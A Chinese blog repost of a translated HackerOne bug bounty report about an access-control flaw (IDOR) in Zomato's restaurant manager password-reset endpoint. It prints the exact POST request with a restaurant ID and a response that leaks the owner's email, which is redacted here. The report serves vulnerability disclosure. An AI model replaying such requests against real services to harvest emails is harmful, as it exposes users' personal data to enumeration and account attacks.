【HackOne翻译】通过密码重置功能来泄露商家的电子邮件

上网导航 2023-12-09 335 0条评论
摘要: 漏洞类型:访问控制不当赏金:$ 500关键词:IDOR原文链接:一、简介找一个很酷的IDOR,它再次泄漏了所有Zomato用户的电子邮件地址。...

漏洞类型:访问控制不当

赏金:$ 500

关键词:IDOR

原文链接:

一、简介

找一个很酷的IDOR,它再次泄漏了所有Zomato用户的电子邮件地址。无论您是否拥有餐厅的管理权限,此攻击都有效。

二、漏洞细节

请求重置密码数据包时,餐馆老板的邮箱会泄露在回显的响应中。

POST请求包

POST /php/restaurant_manager_reset_password.php HTTP/1.1
Host: www.zomato.com
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Referer: https://www.zomato.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 10


res_id=2100935

响应包

{"status":"success","message":"You will receive a recovery mail at ██████████@gmail.com, if it's in our database. Please check your inbox to start the password recovery process."}

这意味着,这可以帮助攻击者从Zomato的数据库中提取数百万封电子邮件。如果攻击者可以访问此POST请求,那么这将是一个巨大的泄漏。

三、危害

这可以使攻击者从Zomato数据库提取所有电子邮件。而且我们都知道电子邮件当然也是登录名,因此考虑到业务的性质,我将其归类为巨大的泄漏。

【HackOne翻译】通过密码重置功能来泄露商家的电子邮件

文章版权及转载声明:

作者:上网导航本文地址:https://www.90xe.com/post/7014.html发布于 2023-12-09
文章转载或复制请以超链接形式并注明出处技术导航

分享到:

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏